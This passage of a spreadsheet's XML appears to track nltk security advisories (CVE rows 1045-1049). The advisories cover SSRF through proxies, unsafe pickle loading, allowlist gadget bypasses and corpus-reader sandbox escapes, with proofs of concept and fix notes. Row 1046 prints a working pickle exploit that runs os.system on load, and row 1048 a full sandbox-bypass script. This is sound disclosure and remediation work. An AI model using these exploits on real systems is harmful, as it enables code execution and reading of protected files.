          <t>OSV</t>
        </is>
      </c>
      <c r="G1045" s="5" t="inlineStr"/>
      <c r="H1045" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1045" s="5" t="inlineStr"/>
      <c r="J1045" s="5" t="inlineStr"/>
      <c r="K1045" s="5" t="inlineStr"/>
      <c r="L1045" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1045" s="5" t="inlineStr">
        <is>
          <t>3.10.3</t>
        </is>
      </c>
      <c r="N1045" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1045" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1045" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1045" s="5" t="inlineStr"/>
      <c r="R1045" s="5" t="inlineStr"/>
      <c r="S1045" s="5" t="inlineStr">
        <is>
          <t>### Summary
Current NLTK source reopens SSRF in proxied environments. `pathsec.urlopen()` validates the requested hostname locally, but once proxy inheritance is enabled the real fetch is performed by the proxy rather than by the validated direct-connect socket path.
### Details
- **Vulnerability type:** Server-side request forgery
- **Affected component:** `nltk.pathsec.urlopen`, `nltk.data.load`, `nltk.downloader.Downloader.index`, `nltk.downloader.Downloader.download`
- **Affected versions:** Current source `v3.10.0-rc2`; published `3.9.4` was a negative control and did not reproduce.
- **Patched versions:** Not yet patched
- **Root cause:** Proxy-handler inheritance disables `_SafeHTTPHandler` and `_SafeHTTPSHandler`, so the validated hostname no longer matches the actual egress destination.
The hardened direct path pins the validated numeric destination IP before opening the socket. The proxied branch instead copies `ProxyHandler` instances from the global opener, marks the request as proxied, and skips the pinned handlers. I confirmed that a validated public URL can be fetched from a loopback-only internal service through the proxy path via `pathsec.urlopen()`, `nltk.data.load()`, `Downloader.index()`, and `Downloader.download()`.
### PoC
**Preconditions**
- The runtime has an HTTP proxy configured and the caller relies on `pathsec` to keep network fetches SSRF-safe.
**Steps**
1. Start a loopback-only HTTP server that serves secret text, a valid downloader index, and a ZIP payload.
2. Configure a proxy that forwards a validated public URL to that internal loopback service.
3. Call `pathsec.urlopen()` or `nltk.data.load()` on the public URL and observe the internal response is returned.
4. Instantiate `Downloader(server_index_url=...)`, call `index()` and `download()`, and observe internal-only content is parsed and installed.
**Minimal reproducible excerpt**
```text
{'urlopen': 'PROXY_TEXT_SECRET', 'data_load': 'PROXY_TEXT_SECRET', 'downloaded_file': 'INTERNAL_ZIP_SECRET'}
```
### Impact
Consumers that trust `pathsec` as an SSRF barrier in proxied environments can be made to read internal-only HTTP resources, load forged downloader indexes, and install attacker-chosen package content fetched from the proxy's network view.
### Remediation
Preserve destination validation for the actual proxy egress target or fail closed when the request would otherwise downgrade into an unpinned proxied path. Add regression tests across `pathsec.urlopen`, `nltk.data.load`, and downloader fetches with a configured proxy.
### References
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/pathsec.py#L468-L518
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/data.py#L1247-L1283
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/downloader.py#L875-L889
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/downloader.py#L1220-L1226
- https://github.com/nltk/nltk/blob/3.9.4/nltk/pathsec.py#L245-L250
---
## Fix + attack demonstration (verified)
NLTK cannot pin the egress through a proxy, so it stops pretending to: under `ENFORCE` a proxied fetch is **refused** rather than performed unvalidated. Operators who trust their proxy opt back in with `NLTK_ALLOW_PROXIED_URLOPEN=1` or `nltk.pathsec.ALLOW_PROXIED_FETCH=True`; under `ENFORCE=False` the refusal degrades to a warning. This closes the **whole class** (environment proxies and explicit `ProxyHandler` alike), because NLTK declines any fetch whose egress it cannot validate.
## Attack demonstration (reproduced; captured output)
A loopback HTTP server stands in for the internal target; `http_proxy` points at it; NLTK is asked for a **public** IP URL.
**Before the fix** — the internal secret is exfiltrated through the proxy:
```
validate_network_url(public): PASSED
*** BYPASS: pathsec.urlopen returned INTERNAL content via proxy: 'INTERNAL_ONLY_SECRET'
```
**After the fix** — five scenarios, isolated subprocesses:
| Scenario | Result |
|---|---|
| proxied (env) + ENFORCE | `PermissionError` — **blocked** |
| proxied + opt-in | returns secret — escape hatch works |
| explicit `ProxyHandler` (not env) + ENFORCE | `PermissionError` — **blocked** (whole class) |
| no proxy (direct) | internal IP still refused — pinning intact |
| proxied + `ENFORCE=False` | returns secret **+ warns** |
## Tests
`nltk/test/unit/test_pathsec.py`: 64 passed. Added an end-to-end regression (`test_proxied_fetch_does_not_reach_internal_target`) plus `test_env_proxy_fails_closed_under_enforce`; the prior `test_env_proxy_skips_pinning_handlers` (which encoded the vulnerable path) is re-expressed as the opt-in case. Existing direct-path DNS-rebinding and IP-policy tests unchanged and passing. pre-commit (isort/black/ruff) clean.
## Note
The upfront `validate_network_url()` and the direct-path IP pinning (from the earlier DNS-rebinding fixes, CVE-2026-54296 / GHSA-qvv7) are unchanged — this only closes the proxied downgrade they didn't cover.</t>
        </is>
      </c>
      <c r="T1045" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78682</t>
        </is>
      </c>
    </row>
    <row r="1046">
      <c r="A1046" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1046" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1046" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78683</t>
        </is>
      </c>
      <c r="D1046" s="5" t="inlineStr"/>
      <c r="E1046" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1046" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1046" s="5" t="inlineStr"/>
      <c r="H1046" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1046" s="5" t="inlineStr"/>
      <c r="J1046" s="5" t="inlineStr"/>
      <c r="K1046" s="5" t="inlineStr"/>
      <c r="L1046" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1046" s="5" t="inlineStr">
        <is>
          <t>3.10.0</t>
        </is>
      </c>
      <c r="N1046" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1046" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1046" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1046" s="5" t="inlineStr"/>
      <c r="R1046" s="5" t="inlineStr"/>
      <c r="S1046" s="5" t="inlineStr">
        <is>
          <t>## Summary
The NLTK library's `TransitionParser.parse()` method deserializes model files using `pickle_load()` with the default `restricted=False` parameter, allowing arbitrary Python code execution when loading a malicious model file. The library provides a `RestrictedUnpickler` class for safe deserialization, but it is never used by production code paths, leaving the vulnerability unpatched.
## Root Cause
**File:** `nltk/parse/transitionparser.py` (lines 542-557)
The `parse()` method calls `pickle_load(f)` without `restricted=True`, routing through `WarningUnpickler` which inherits from `pickle.Unpickler` and does NOT override `find_class()`. This allows arbitrary class/function resolution during unpickling, enabling RCE via standard pickle gadgets (e.g., `os.system`, `subprocess.Popen`).
**Vulnerability chain in `nltk/picklesec.py`:**
```python
def pickle_load(file, *, context=None, restricted=False):
    if restricted:
        return RestrictedUnpickler(file).load()  # Safe: blocks all globals
    return WarningUnpickler(file, context=context).load()  # VULNERABLE PATH
```
`WarningUnpickler` only emits a warning but does NOT block unsafe class loading — it calls `super().load()` which is standard `pickle.Unpickler.load()`.
**Why this is not by design:**
- NLTK intentionally created `RestrictedUnpickler` to block unsafe deserialization
- The `restricted=True` parameter exists in the API but is **never used** by any production code path
- All call sites use the default `restricted=False`: `transitionparser.py:557`, `parse/chartparser_app.py:816`, `parse/chartparser_app.py:2273`, `parse/chartparser_app.py:2311`
## Attack Surface
**Entry point:** `TransitionParser().parse(depgraphs, modelFile)` receives a filesystem path with no validation.
**Exploitation path:**
1. Attacker places a malicious pickle file at a known or attacker-controlled location
2. Victim calls `parser.parse(sentences, "/path/to/malicious_model.pkl")`
3. `pickle_load()` deserializes the file with `restricted=False` (default)
4. Standard pickle gadget chain executes arbitrary Python code with victim's privileges
**Impact:** Remote code execution with the privileges of the user running the NLTK-dependent application. Affects researchers, data scientists, and automated ML pipelines using NLTK for parsing tasks.
## Steps to Reproduce
### Environment
- NLTK version: 3.8.1+ (all versions with `transitionparser.py`)
- Python 3.6+
- No special dependencies required
### Reproduction
1. Create a malicious pickle file that uses `__reduce__` to execute a system command during deserialization.
2. Call `TransitionParser().parse([], '/path/to/malicious_model.pkl')`.
3. The `pickle_load(f)` call at `transitionparser.py:557` uses `restricted=False` by default, routing through `WarningUnpickler`, which does not override `find_class()` and permits full class resolution — executing the embedded gadget.
4. Arbitrary code executes with the victim's privileges.
### Proof That the Fix Works
Changing line 557 in `transitionparser.py` from:
```python
model = pickle_load(f)
```
to:
```python
model = pickle_load(f, restricted=True)
```
causes `RestrictedUnpickler` to raise an `UnpicklingError` and block execution, confirming the safe path prevents the attack.
### Working PoC
```python
import pickle
import os
from nltk.parse.transitionparser import TransitionParser
# Create malicious pickle with RCE payload
class Exploit:
    def __reduce__(self):
        return (os.system, ('touch /tmp/nltk_poc_triggered',))
with open('/tmp/malicious_model.pkl', 'wb') as f:
    pickle.dump(Exploit(), f)
# Trigger the vulnerable code path (requires algorithm argument in ≤ 3.9.4)
parser = TransitionParser('arc-standard')      # or 'arc-eager'
parser.parse([], '/tmp/malicious_model.pkl')   # loads and unpickles unsafely
# Exploit succeeds: file /tmp/nltk_poc_triggered is created
```
On NLTK ≥ 3.10.0 (patched), the same code fails with:
```
_pickle.UnpicklingError: global 'posix.system' is not in the pickle allowlist
```
This proves the vulnerability exists in versions ≤ 3.9.4 and is fixed in 3.10.0+.
## Recommended Fix
Change all call sites to use `restricted=True`:
| File | Line | Before | After |
|------|------|--------|-------|
| `nltk/parse/transitionparser.py` | 557 | `pickle_load(f)` | `pickle_load(f, restricted=True)` |
| `nltk/parse/chartparser_app.py` | 816 | `pickle_load(model_data_file)` | `pickle_load(model_data_file, restricted=True)` |
| `nltk/parse/chartparser_app.py` | 2273 | `pickle_load(file)` | `pickle_load(file, restricted=True)` |
| `nltk/parse/chartparser_app.py` | 2311 | `pickle_load(fp)` | `pickle_load(fp, restricted=True)` |
**Note:** This fix may affect loading older sklearn models. A more robust approach would implement a module allowlist in `RestrictedUnpickler.find_class()`.</t>
        </is>
      </c>
      <c r="T1046" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78683</t>
        </is>
      </c>
    </row>
    <row r="1047">
      <c r="A1047" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1047" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1047" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79657</t>
        </is>
      </c>
      <c r="D1047" s="5" t="inlineStr"/>
      <c r="E1047" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1047" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1047" s="5" t="inlineStr"/>
      <c r="H1047" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I1047" s="5" t="inlineStr"/>
      <c r="J1047" s="5" t="inlineStr"/>
      <c r="K1047" s="5" t="inlineStr"/>
      <c r="L1047" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1047" s="5" t="inlineStr">
        <is>
          <t>3.10.3</t>
        </is>
      </c>
      <c r="N1047" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1047" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1047" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1047" s="5" t="inlineStr"/>
      <c r="R1047" s="5" t="inlineStr"/>
      <c r="S1047" s="5" t="inlineStr">
        <is>
          <t>### Summary
The current source tree still allows arbitrary code execution during supposedly safer allowlisted pickle loading. The allowlist trusts whole module namespaces instead of exact safe globals, so crafted pickles can invoke dangerous in-namespace callables through pickle REDUCE.
### Details
- **Vulnerability type:** Remote code execution via unsafe deserialization
- **Affected component:** `nltk.picklesec.allowlisted_pickle_load`, `nltk.tokenize.punkt.punkt_pickle_load`, `nltk.parse.transitionparser.TransitionParser.parse`
- **Affected versions:** Current source `v3.10.0-rc2`; published `3.9.4` was not the claim target for this bypass.
- **Patched versions:** Not yet patched
- **Root cause:** Module-prefix allowlists include dangerous callables such as `nltk.tokenize.repp.ReppTokenizer._execute` and `numpy.f2py.crackfortran.myeval`.
`punkt_pickle_load()` allowlists both `nltk.tokenize.punkt` and the whole `nltk.tokenize` namespace, which exposes `ReppTokenizer._execute()` and its `subprocess.Popen(...)` sink during unpickling. `TransitionParser.parse()` uses `allowlisted_pickle_load(..., allowed_modules=("numpy", "scipy", "sklearn"))`, which permits `numpy.f2py.crackfortran.myeval()` and its attacker-controlled `eval(...)` path. I confirmed both gadgets create marker files before the caller returns or later aborts on type misuse.
### PoC
**Preconditions**
- The application loads an attacker-controlled tokenizer or model artifact through these public loaders.
**Steps**
1. Create a pickle whose REDUCE callable is `ReppTokenizer._execute` and point its command to a harmless marker-file write.
2. Pass that payload to `punkt_pickle_load(BytesIO(payload))` and observe the marker file is created during unpickling.
3. Create a second pickle whose REDUCE callable is `numpy.f2py.crackfortran.myeval` and load it through `TransitionParser.parse()`.
4. Observe the second marker file is created before `TransitionParser.parse()` later fails on the returned object type.
**Minimal reproducible excerpt**
```text
{'punkt_marker': 'PUNKT_RCE', 'transitionparser_marker': 'TP_RCE'}
```
### Impact
Any caller that trusts these current allowlisted loaders can still execute attacker-controlled commands while loading model or tokenizer artifacts. This defeats the protection mechanism that replaced unrestricted pickle loading and creates a dangerous false sense of safety.
### Remediation
Replace broad module-prefix allowlists with exact `(module, qualname)` pairs for the few safe classes or functions genuinely required. Do not allow entire namespaces such as `nltk.tokenize` or `numpy`, and keep post-load type validation only as a secondary defense.
### Resources
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/tokenize/punkt.py#L120-L134
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/tokenize/repp.py#L111-L115
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/parse/transitionparser.py#L26-L30
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/parse/transitionparser.py#L565-L571
---
## Fix + attack demonstration (verified)
 + tightened callers
`find_class` now, before the allowlists:
1. **Rejects any dotted `name`** → closes 4489 with zero legit impact.
2. **Denies dangerous modules** (`os`, `subprocess`, `sys`, `builtins`, `numpy.f2py`, `nltk.tokenize.repp`, …) even under a broad `allowed_modules` — a defense-in-depth **backstop** so a future too-broad allowlist can't silently reopen RCE.
3. **`builtins` denied wholesale**; safe primitives (`int`, `str`, …) must be named exactly via `allowed_globals`.
Callers tightened: punkt drops the broad `nltk.tokenize` (keeps `nltk.tokenize.punkt` + exact `collections.defaultdict`/`builtins.int`); transitionparser keeps numpy/scipy/sklearn (array unpickling needs their submodules) with the new guards blocking the gadgets.
## Full pickle-sink audit
Every deserialization sink in the tree was reviewed: **no raw `pickle.load`** anywhere, and **no** joblib/numpy/torch/dill/yaml/marshal loaders. `data.load` + `wordnet_app` use `RestrictedUnpickler` (blocks all globals — safe); the remaining `pickle_load` sites (`chartparser_app`, `tbl/demo`) load user-selected or self-written files and keep their warning.
## Attack demonstration (captured; fork clone)
```
=== EXPLOITS blocked ===
  4489 sklearn.os.system (dotted)      -&gt; BLOCKED
  x99w numpy.f2py.crackfortran.myeval  -&gt; BLOCKED
  x99w nltk.tokenize.repp._execute     -&gt; BLOCKED
  backstop os.system (os allowlisted)  -&gt; BLOCKED
  backstop builtins.eval (exact global)-&gt; BLOCKED
=== LEGIT loads still work ===
  punkt round-trip via punkt_pickle_load -&gt; OK
  builtins.int (safe primitive)          -&gt; OK
```
## Tests
`test_pickle_allowlist_security.py` — added 5 regressions (dotted traversal, both namespace gadgets, denied-module backstop, legit round-trip). Suite: 122 passed / 9 skipped (sklearn-dependent) across pickle/punkt/transition/tokenize. pre-commit (black/isort/ruff) clean.</t>
        </is>
      </c>
      <c r="T1047" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79657</t>
        </is>
      </c>
    </row>
    <row r="1048">
      <c r="A1048" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1048" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1048" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79674</t>
        </is>
      </c>
      <c r="D1048" s="5" t="inlineStr"/>
      <c r="E1048" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1048" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1048" s="5" t="inlineStr"/>
      <c r="H1048" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1048" s="5" t="inlineStr"/>
      <c r="J1048" s="5" t="inlineStr"/>
      <c r="K1048" s="5" t="inlineStr"/>
      <c r="L1048" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1048" s="5" t="inlineStr">
        <is>
          <t>3.10.3</t>
        </is>
      </c>
      <c r="N1048" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1048" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1048" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1048" s="5" t="inlineStr"/>
      <c r="R1048" s="5" t="inlineStr"/>
      <c r="S1048" s="5" t="inlineStr">
        <is>
          <t>## Summary
NLTK corpus-reader constructors can still reach outside-root file and database reads before the `nltk.pathsec` sandbox boundary is enforced.
The PoC shows the safe path blocked by `pathsec.open`, then `LinThesaurusCorpusReader` and `PanLexLiteCorpusReader` succeeding in the same process.
## Affected Product
- Product: NLTK
- Asset / component: `nltk.corpus.reader` constructors
- Version tested: `3.10.2`
- Deployment / package / tag: commit `474af1f5a94b1b8d53fc2b6defec3a2ce7633b74` / PyPI `nltk`
- Environment used for verification: Python 3.13.14
## Vulnerability Details
- Vulnerability class: path sandbox bypass / external control of file path
- Required privileges: none beyond the ability to supply a corpus root path to a consumer call site
- Entry point: `LinThesaurusCorpusReader(root)` and `PanLexLiteCorpusReader(root)`
- Trust boundary crossed: NLTK data-root sandbox enforced by `nltk.pathsec`
- Root affected functions:
  - [CorpusReader.__init__](https://github.com/nltk/nltk/blob/474af1f5a94b1b8d53fc2b6defec3a2ce7633b74/nltk/corpus/reader/api.py#L73-L80)
  - [LinThesaurusCorpusReader.__init__](https://github.com/nltk/nltk/blob/474af1f5a94b1b8d53fc2b6defec3a2ce7633b74/nltk/corpus/reader/lin.py#L37-L43)
  - [PanLexLiteCorpusReader.__init__](https://github.com/nltk/nltk/blob/474af1f5a94b1b8d53fc2b6defec3a2ce7633b74/nltk/corpus/reader/panlex_lite.py#L45-L46)
- Measured unsafe effect: outside-root file/database reads still happen with `ENFORCE=True`
## Root Cause
`CorpusReader.__init__()` turns a string root into a `FileSystemPathPointer` without any `pathsec` validation, and these readers then use builtin `open()` or `sqlite3.connect()` directly on derived paths. The constructor path therefore never hits the sandbox guard that `pathsec.open()` enforces.
```python
if zipfile:
    root = ZipFilePathPointer(zipfile, zipentry)
else:
    root = FileSystemPathPointer(root)
with open(path) as lin_file:
    ...
self._c = sqlite3.connect(os.path.join(root, "db.sqlite")).cursor()
```
## Proof of Concept
Save the script as `hy01_raw_path_poc.py` in the checkout root and run `python hy01_raw_path_poc.py`.
```python
#!/usr/bin/env python3
"""PoC for HY-01: corpus-reader sandbox bypass.
This script proves three facts:
- pathsec blocks a direct read through the sandboxed file API
- LinThesaurusCorpusReader still reaches builtin open() on an outside path
- PanLexLiteCorpusReader still opens an outside sqlite database and loads data
"""
from __future__ import annotations
import builtins
import pathlib
import sqlite3
import sys
import tempfile
from unittest.mock import patch
try:
    import nltk.pathsec as pathsec
    from nltk.corpus.reader.lin import LinThesaurusCorpusReader
    from nltk.corpus.reader.panlex_lite import PanLexLiteCorpusReader
except ModuleNotFoundError:
    here = pathlib.Path(__file__).resolve()
    for base in (here.parent, *here.parents):
        if (base / "nltk").is_dir() and (base / "setup.py").exists():
            sys.path.insert(0, str(base))
            break
    else:
        raise RuntimeError(
            "Could not import nltk. Run this script from an NLTK checkout root "
            "or from an environment where the current checkout is installed."
        )
    import nltk.pathsec as pathsec
    from nltk.corpus.reader.lin import LinThesaurusCorpusReader
    from nltk.corpus.reader.panlex_lite import PanLexLiteCorpusReader
def main() -&gt; int:
    pathsec.ENFORCE = True
    with patch.object(pathsec, "_get_allowed_roots", lambda: set()):
        with patch.object(pathsec.os, "getcwd", lambda: "sandbox-disabled"):
            with tempfile.TemporaryDirectory() as tmp:
                tmpdir = pathlib.Path(tmp)
                outside = tmpdir / "outside"
                outside.mkdir()
                blocked_file = outside / "blocked.txt"
                blocked_file.write_text("blocked", encoding="utf-8")
                control_target = str(blocked_file)
                try:
                    with pathsec.open(control_target, "rb"):
                        raise AssertionError(
                            "pathsec.open unexpectedly allowed control path"
                        )
                except PermissionError:
                    print("control:pathsec.open=blocked")
                lin_root = tmpdir / "lin"
                lin_root.mkdir()
                lin_file = lin_root / "simN.lsp"
                lin_file.write_text(
                    '("business" (desc 1.0)\n\t"enterprise"\t0.9\n))\n',
                    encoding="utf-8",
                )
                opened = []
                real_open = builtins.open
                def tracking_open(*args, **kwargs):
                    opened.append(str(args[0]))
                    return real_open(*args, **kwargs)
                with patch("builtins.open", tracking_open):
                    LinThesaurusCorpusReader(str(lin_root))
                if any(p.endswith("simN.lsp") for p in opened):
                    print("lin:outside_root_open=success")
                else:
                    raise AssertionError("LinThesaurusCorpusReader did not open data")
                panlex_root = tmpdir / "panlex"
                panlex_root.mkdir()
                db_path = panlex_root / "db.sqlite"
                db = sqlite3.connect(db_path)
                cur = db.cursor()
                cur.execute("create table lv(uid text, lv text, lc text, tt text)")
                cur.execute("create table dnx(ex int, mn int, uq int, ap int, ui text)")
                cur.execute("create table ex(ex int, tt text, lv text, uq int)")
                cur.execute(
                    "insert into lv(uid, lv, lc, tt) values ('u1', 'lv1', 'en', 'English')"
                )
                db.commit()
                db.close()
                reader = PanLexLiteCorpusReader(str(panlex_root))
                result = reader.language_varieties()
                if result == [("u1", "English")]:
                    print("panlex:language_varieties=success")
                else:
                    raise AssertionError("PanLexLiteCorpusReader did not load data")
    return 0
if __name__ == "__main__":
    raise SystemExit(main())
```
Expected output:
```
control:pathsec.open=blocked
lin:outside_root_open=success
panlex:language_varieties=success
```
## Impact
A caller can make NLTK read filesystem content outside the intended NLTK data sandbox through public corpus-reader constructors. In the PoC, that includes a local text file and a local SQLite db.
## Severity
- Base Score: 7.5 (High)
- Severity reasoning:
  The bug is reliably triggerable by caller-controlled path input and exposes data outside the intended trust boundary; no special privileges are needed inside the process.
## Remediation
Validate raw string roots before constructing readers, and route all corpus-root/path handling through `pathsec` or a validated `PathPointer`. Remove direct builtin `open()` and direct `sqlite3.connect(os.path.join(...))` use on constructor-derived paths.</t>
        </is>
      </c>
      <c r="T1048" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79674</t>
        </is>
      </c>
    </row>
    <row r="1049">
      <c r="A1049" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1049" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1049" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79676</t>
        </is>
      </c>
      <c r="D1049" s="5" t="inlineStr"/>
      <c r="E1049" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1049" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1049" s="5" t="inlineStr"/>
      <c r="H1049" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1049" s="5" t="inlineStr"/>
      <c r="J1049" s="5" t="inlineStr"/>
      <c r="K1049" s="5" t="inlineStr"/>
      <c r="L1049" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1049" s="5" t="inlineStr">
        <is>
          <t>3.10.3</t>
        </is>
      </c>
      <c r="N1049" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1049" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1049" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1049" s="5" t="inlineStr"/>
      <c r="R1049" s="5" t="inlineStr"/>
      <c r="S1049" s="5" t="inlineStr">
        <is>
          <t>### Summary
Several corpus readers still step outside NLTK's symlink-aware trusted-root model. They derive in-root paths from trusted corpus state, convert those paths back into plain strings, and reopen them with built-in `open()` rather than `nltk.pathsec.open()`.
### Details
- **Vulnerability type:** Path traversal and symlink boundary bypass
- **Affected component:** `nltk.corpus.reader.ipipan`, `nltk.corpus.reader.crubadan`, `nltk.corpus.reader.lin`
- **Affected versions:** Published `3.9.4` and current source `v3.10.0-rc2` both reproduced.
- **Patched versions:** Not yet patched
- **Root cause:** Root-derived paths are reopened with raw `open()` without preserving the trusted-root boundary.
`IPIPANCorpusReader` opens `header.xml` derived from `morph.xml`, `CrubadanCorpusReader` opens `table.txt` directly, and `LinThesaurusCorpusReader` opens `simN.lsp` paths returned from its own root helpers. Under `pathsec.ENFORCE=True`, a symlink placed inside the trusted corpus root can point outside the root and still be parsed successfully. It was confirmed parsed outside-root content is returned through public methods such as `channels()`, `domains()`, `categories()`, `langs()`, `crubadan_to_iso()`, `synonyms()`, and `scored_synonyms()`.
### PoC
**Preconditions**
- The application processes attacker-influenced corpora inside a trusted NLTK data root or trusted corpus directory.
**Steps**
1. Create a trusted corpus root and keep `pathsec.ENFORCE=True` with that root allowlisted.
2. Place symlinked reader inputs such as `header.xml`, `table.txt`, or `simN.lsp` inside the root and point them to external files.
3. Instantiate the corresponding corpus reader and call its normal public methods.
4. Observe that parsed outside-root values are returned even though `pathsec.open()` blocks the same symlink targets.
**Minimal reproducible excerpt**
```text
{'ipipan': ['LEAK', 'TOPSECRET', 'CLASSIFIED'], 'crubadan': ['LEAK'], 'lin': [('LEAK', 9.5)]}
```
### Impact
An attacker who can stage corpus files or symlinks under a trusted data root can disclose outside-root content through normal corpus-reader results, defeating the boundary NLTK documents for shared and untrusted-input environments.
### Remediation
Preserve `PathPointer` and `required_root` semantics end to end. Replace direct `open()` calls with `nltk.pathsec.open()` or a reader helper that keeps the trusted-root boundary intact.
### References
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/ipipan.py#L162-L192
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/crubadan.py#L74-L98
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/lin.py#L40-L43
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/pathsec.py#L521-L545
---
## Fix + full-codebase audit (verified)
I swept every raw file open in the corpus readers, not just the three the umbrella named:
| Reader | Site | Advisory | Root scoping |
|---|---|---|---|
| crubadan | table.txt + `&lt;code&gt;-3grams.txt` | p4rw / j5pw | `required_root=self.root` |
| lin | simN.lsp | p4rw | `required_root=self.root` |
| xmldocs | XMLCorpusView bare-string fileid | 934p (base reader) | global fallback (view has no root) |
| pl196x | textids index | **found by audit** | `required_root=self._root` |
| mte | MTEFileReader | mvf5 | `required_root` threaded through 8 call sites |
| toolbox | StandardFormat.open codecs.open | cr8c | global sandbox (low-level parser) |
| named_entity | load_ace_file ann/text | 7qj2 | global sandbox |
| nkjp | XML_Tool source file | p4rw class | `required_root=self._root` |
`ipipan` already validates via the earlier #3727 fix — unchanged.
## Fix
Each site now calls `nltk.pathsec.validate_path(path, required_root=…)` before opening. Where the reader has a concrete corpus root, the check is **scoped** with `required_root` (rejects any escape outside that root). `XMLCorpusView` carries no root, so it falls back to the global data-root sandbox via `getattr(self, "_root", None)` — which also avoids an AttributeError on the bare-string path.
## Reproduced (captured)
```
raw open(symlink) reads: 'TOPSECRET_OUTSIDE_ROOT'          &lt;- the bypass
validate_path(symlink, required_root): ValueError -&gt; BLOCKS the escape
validate_path(legit in-root): PASSED                       &lt;- loads normally
```
## Honest residual
The global-sandbox fallback (toolbox, named_entity, xmldocs-view) is only as tight as the allowed-roots list, which currently includes the **system temp dir**. Scoping every reader with `required_root` and removing the temp dir from the allowed roots would harden it further (separate advisory / task).
## Tests
`test_corpus_reader_pathsec.py` — symlink escape rejected, in-root file allowed, XMLCorpusView string-fileid no AttributeError, MTEFileReader out-of-root rejected. 46 existing corpus/toolbox tests pass; all edited modules import (no circular import). pre-commit (black/isort/ruff) clean.
---
## Scope caveat
`validate_path` blocks every symlink escape variant (verified) and equals `pathsec.open()`'s guarantee, but does NOT block **hardlinks** (no symlink to resolve; tracked separately as GHSA-f794-5jv7-7672) or the validate-then-open TOCTOU race (shared by `pathsec.open`; needs O_NOFOLLOW/openat).</t>
        </is>
      </c>
      <c r="T1049" s="6" t="inlineStr">
        <is>
